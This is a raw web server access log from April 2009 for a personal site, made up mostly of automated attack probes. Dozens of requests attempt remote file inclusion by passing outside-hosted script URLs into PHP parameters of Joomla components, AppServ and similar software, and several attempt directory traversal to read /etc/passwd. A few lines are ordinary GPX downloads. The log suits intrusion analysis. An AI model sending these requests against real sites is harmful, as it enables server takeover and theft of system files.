72.47.237.161 - - [28/Apr/2009:11:02:19 -0700] "GET /logs/access_081008.log//index.php?DOCUMENT_ROOT=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:02:20 -0700] "GET /logs/access_081116.log/errors.php?error=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:02:20 -0700] "GET /logs/access_090112.log/errors.php?error=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:02:20 -0700] "GET /logs/errors.php?error=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:02:20 -0700] "GET /errors.php?error=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.133.83.130 - - [28/Apr/2009:11:02:30 -0700] "GET /logs/access_080615.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.133.83.130 - - [28/Apr/2009:11:02:30 -0700] "GET /logs/access_081208.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:02:33 -0700] "GET /logs///skin/zero_vote/login.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:02:33 -0700] "GET //skin/zero_vote/login.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:02:33 -0700] "GET /logs/access_071214.log///skin/zero_vote/login.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.239.74 - - [28/Apr/2009:11:02:45 -0700] "GET /logs/access_080615.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://algol.u-strasbg.fr/~jcame//selops/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.239.74 - - [28/Apr/2009:11:02:45 -0700] "GET /logs/access_081208.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://algol.u-strasbg.fr/~jcame//selops/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:03:24 -0700] "GET /logs/access_080331.log///skin/zero_vote/login.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.192.43 - - [28/Apr/2009:11:03:30 -0700] "GET /export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.192.43 - - [28/Apr/2009:11:03:30 -0700] "GET /export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.199.222.19 - - [28/Apr/2009:11:04:00 -0700] "GET /logs/access_081116.log/errors.php?error=http://www.geocities.com/cantikpuri/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.199.222.19 - - [28/Apr/2009:11:04:00 -0700] "GET /errors.php?error=http://www.geocities.com/cantikpuri/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.199.222.19 - - [28/Apr/2009:11:04:00 -0700] "GET /logs/access_090112.log/errors.php?error=http://www.geocities.com/cantikpuri/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.199.222.19 - - [28/Apr/2009:11:04:01 -0700] "GET /logs/errors.php?error=http://www.geocities.com/cantikpuri/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.199.222.19 - - [28/Apr/2009:11:04:03 -0700] "GET /logs/access_090112.log/errors.php?error=http://www.geocities.com/cantikpuri/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.199.222.19 - - [28/Apr/2009:11:04:03 -0700] "GET /logs/access_081116.log/errors.php?error=http://www.geocities.com/cantikpuri/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.199.222.19 - - [28/Apr/2009:11:04:03 -0700] "GET /errors.php?error=http://www.geocities.com/cantikpuri/id.txt%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.199.222.19 - - [28/Apr/2009:11:04:03 -0700] "GET /logs/errors.php?error=http://www.geocities.com/cantikpuri/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.14 - - [28/Apr/2009:11:04:29 -0700] "GET /logs/access_090302.log/index.php?lg=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [28/Apr/2009:11:04:32 -0700] "GET /logs/access_090415.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.62.42.242 - - [28/Apr/2009:11:04:33 -0700] "GET /appserv/main.php?appserv_root=http://www.freeimagehosting.net/uploads/faa2cb3307.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.42.242 - - [28/Apr/2009:11:04:33 -0700] "GET /logs/access_080711.log//appserv/main.php?appserv_root=http://www.freeimagehosting.net/uploads/faa2cb3307.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.42.242 - - [28/Apr/2009:11:04:33 -0700] "GET /appserv/main.php?appserv_root=http://www.freeimagehosting.net/uploads/04dff96c74.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.42.242 - - [28/Apr/2009:11:04:33 -0700] "GET /logs/access_080711.log//appserv/main.php?appserv_root=http://www.freeimagehosting.net/uploads/04dff96c74.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.42.242 - - [28/Apr/2009:11:04:36 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.freeimagehosting.net/uploads/faa2cb3307.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.42.242 - - [28/Apr/2009:11:04:36 -0700] "GET /logs/access_080330.log//appserv/main.php?appserv_root=http://www.freeimagehosting.net/uploads/faa2cb3307.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.42.242 - - [28/Apr/2009:11:04:37 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.freeimagehosting.net/uploads/04dff96c74.jpg?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.42.242 - - [28/Apr/2009:11:04:37 -0700] "GET /logs/access_080330.log//appserv/main.php?appserv_root=http://www.freeimagehosting.net/uploads/04dff96c74.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:04:37 -0700] "GET /logs/access_090112.log%20%20/errors.php?error=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:04:37 -0700] "GET /logs/access_081116.log%20%20/errors.php?error=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:04:40 -0700] "GET /logs/access_090112.log%20%20/errors.php?error=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:04:40 -0700] "GET /logs/access_081116.log%20%20/errors.php?error=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.68.188.206 - - [28/Apr/2009:11:04:52 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.68.188.206 - - [28/Apr/2009:11:04:52 -0700] "GET /logs/access_081119.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.68.188.206 - - [28/Apr/2009:11:04:52 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.239.74 - - [28/Apr/2009:11:04:56 -0700] "GET /logs/access_080313.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://algol.u-strasbg.fr/~jcame//selops/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.172.186.250 - - [28/Apr/2009:11:05:01 -0700] "GET /appserv/main.php?appserv_root=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.172.186.250 - - [28/Apr/2009:11:05:01 -0700] "GET /logs/access_080711.log%20%20//appserv/main.php?appserv_root=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.172.186.250 - - [28/Apr/2009:11:05:01 -0700] "GET /logs/access_090220.log%20%20//appserv/main.php?appserv_root=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.172.186.250 - - [28/Apr/2009:11:05:01 -0700] "GET /logs//appserv/main.php?appserv_root=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [28/Apr/2009:11:05:02 -0700] "GET /logs/access_090407.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.104.37.122 - - [28/Apr/2009:11:05:18 -0700] "GET /logs/access_080711.log//appserv/main.php?appserv_root=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
216.104.37.122 - - [28/Apr/2009:11:05:18 -0700] "GET /appserv/main.php?appserv_root=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
216.104.37.122 - - [28/Apr/2009:11:05:18 -0700] "GET /logs//appserv/main.php?appserv_root=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
216.104.37.122 - - [28/Apr/2009:11:05:18 -0700] "GET /logs/access_080330.log//appserv/main.php?appserv_root=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
217.172.186.250 - - [28/Apr/2009:11:05:23 -0700] "GET /logs/access_080711.log//appserv/main.php?appserv_root=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.172.186.250 - - [28/Apr/2009:11:05:23 -0700] "GET /logs/access_080330.log//appserv/main.php?appserv_root=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.79.146 - - [28/Apr/2009:11:05:23 -0700] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.79.146 - - [28/Apr/2009:11:05:24 -0700] "GET /logs/components/com_joomlaboard/file_upload.php?sbp=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.79.146 - - [28/Apr/2009:11:05:24 -0700] "GET /logs/access_080611.log/components/com_joomlaboard/file_upload.php?sbp=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.79.146 - - [28/Apr/2009:11:05:39 -0700] "GET /logs/access_081107.log/components/com_joomlaboard/file_upload.php?sbp=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.47.237.161 - - [28/Apr/2009:11:05:42 -0700] "GET /logs/access_081008.log%20%20//index.php?DOCUMENT_ROOT=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.62.42.242 - - [28/Apr/2009:11:05:48 -0700] "GET /logs/access_080313.log/appserv/main.php?appserv_root=http://www.freeimagehosting.net/uploads/faa2cb3307.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.42.242 - - [28/Apr/2009:11:05:48 -0700] "GET /logs/access_080313.log/appserv/main.php?appserv_root=http://www.freeimagehosting.net/uploads/04dff96c74.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.104.37.122 - - [28/Apr/2009:11:06:18 -0700] "GET /appserv/main.php?appserv_root=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
216.104.37.122 - - [28/Apr/2009:11:06:41 -0700] "GET /logs/access_081104.log//export.php?mosConfig_absolute_path=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
217.172.186.250 - - [28/Apr/2009:11:07:01 -0700] "GET /logs/access_090220.log//appserv/main.php?appserv_root=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.62.42.242 - - [28/Apr/2009:11:07:03 -0700] "GET /appserv/main.php?appserv_root=http://www.freeimagehosting.net/uploads/faa2cb3307.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.42.242 - - [28/Apr/2009:11:07:03 -0700] "GET /logs/access_081107.log//appserv/main.php?appserv_root=http://www.freeimagehosting.net/uploads/faa2cb3307.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.42.242 - - [28/Apr/2009:11:07:04 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.freeimagehosting.net/uploads/faa2cb3307.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.42.242 - - [28/Apr/2009:11:07:04 -0700] "GET /logs/access_081107.log//appserv/main.php?appserv_root=http://www.freeimagehosting.net/uploads/04dff96c74.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.42.242 - - [28/Apr/2009:11:07:04 -0700] "GET /appserv/main.php?appserv_root=http://www.freeimagehosting.net/uploads/04dff96c74.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.42.242 - - [28/Apr/2009:11:07:04 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.freeimagehosting.net/uploads/04dff96c74.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.42.242 - - [28/Apr/2009:11:07:13 -0700] "GET /logs/access_090415.log//appserv/main.php?appserv_root=http://www.freeimagehosting.net/uploads/faa2cb3307.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.42.242 - - [28/Apr/2009:11:07:13 -0700] "GET /logs/access_090415.log//appserv/main.php?appserv_root=http://www.freeimagehosting.net/uploads/04dff96c74.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:07:13 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:07:13 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:07:13 -0700] "GET /logs/access_080712.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:07:15 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:07:15 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:07:15 -0700] "GET /logs/access_080712.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.79.146 - - [28/Apr/2009:11:07:32 -0700] "GET /logs/access_080611.log%20%20/components/com_joomlaboard/file_upload.php?sbp=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:07:38 -0700] "GET /logs/access_080712.log%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:07:43 -0700] "GET /logs/access_080712.log%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.133.83.130 - - [28/Apr/2009:11:08:08 -0700] "GET /logs/access_080313.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.186.1.54 - - [28/Apr/2009:11:08:12 -0700] "GET /logs/access_080426.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://yalor.yru.ac.th/~nantharat/modules/left.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [28/Apr/2009:11:08:13 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://yalor.yru.ac.th/~nantharat/modules/left.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [28/Apr/2009:11:08:13 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://yalor.yru.ac.th/~nantharat/modules/left.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
218.150.79.146 - - [28/Apr/2009:11:08:14 -0700] "GET /logs/access_081107.log%20%20/components/com_joomlaboard/file_upload.php?sbp=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.186.1.54 - - [28/Apr/2009:11:08:33 -0700] "GET /logs/access_080731.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://yalor.yru.ac.th/~nantharat/modules/left.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
94.229.68.219 - - [28/Apr/2009:11:08:37 -0700] "GET /logs///?mosConfig_absolute_path=../../../../../../../../etc/passwd HTTP/1.0" 200 97167 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "www.dmulk.com"
94.229.68.219 - - [28/Apr/2009:11:08:39 -0700] "GET /logs//?mosConfig_absolute_path=http://www.suburbane.org//cgi-bin.old? HTTP/1.0" 200 97166 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:11:08:42 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:11:08:57 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:11:09:09 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
210.68.188.206 - - [28/Apr/2009:11:09:11 -0700] "GET /logs/access_081119.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.68.188.206 - - [28/Apr/2009:11:09:11 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.68.188.206 - - [28/Apr/2009:11:09:11 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [28/Apr/2009:11:09:23 -0700] "GET //?mosConfig_absolute_path=../../../../../../../../etc/passwd HTTP/1.0" 200 43299 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:11:09:23 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:09:35 -0700] "GET /logs/access_080511.log/errors.php?error=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [28/Apr/2009:11:09:47 -0700] "GET /?mosConfig_absolute_path=http://www.suburbane.org//cgi-bin.old? HTTP/1.0" 200 43294 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:09:47 -0700] "GET /logs/access_080511.log/errors.php?error=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.41.116.26 - - [28/Apr/2009:11:09:52 -0700] "GET /logs///com_remository/admin.remository.php?mosConfig_absolute_path=../../../../../../../../etc/passwd HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "www.dmulk.com"
193.41.116.26 - - [28/Apr/2009:11:09:52 -0700] "GET //com_remository/admin.remository.php?mosConfig_absolute_path=../../../../../../../../etc/passwd HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "www.dmulk.com"
193.41.116.26 - - [28/Apr/2009:11:09:52 -0700] "GET /logs//com_remository/admin.remository.php?mosConfig_absolute_path=http://www.suburbane.org//cgi-bin.old? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "www.dmulk.com"
193.41.116.26 - - [28/Apr/2009:11:09:52 -0700] "GET /com_remository/admin.remository.php?mosConfig_absolute_path=http://www.suburbane.org//cgi-bin.old? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "www.dmulk.com"
209.62.42.242 - - [28/Apr/2009:11:10:00 -0700] "GET /appserv/main.php?appserv_root=http://www.freeimagehosting.net/uploads/faa2cb3307.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.42.242 - - [28/Apr/2009:11:10:00 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.freeimagehosting.net/uploads/faa2cb3307.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.42.242 - - [28/Apr/2009:11:10:00 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.freeimagehosting.net/uploads/04dff96c74.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.42.242 - - [28/Apr/2009:11:10:00 -0700] "GET /appserv/main.php?appserv_root=http://www.freeimagehosting.net/uploads/04dff96c74.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:10:15 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:10:16 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:10:16 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:10:25 -0700] "GET /logs/access_080526.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.239.146.118 - - [28/Apr/2009:11:10:26 -0700] "GET /logs/index.php?place=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.239.146.118 - - [28/Apr/2009:11:10:27 -0700] "GET /logs/access_080629.log/index.php?place=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:10:27 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:10:27 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:10:27 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.239.146.118 - - [28/Apr/2009:11:10:29 -0700] "GET /logs/access_080528.log/index.php?place=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:11:10:40 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:10:46 -0700] "GET //include/write.php?dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:11:10:55 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
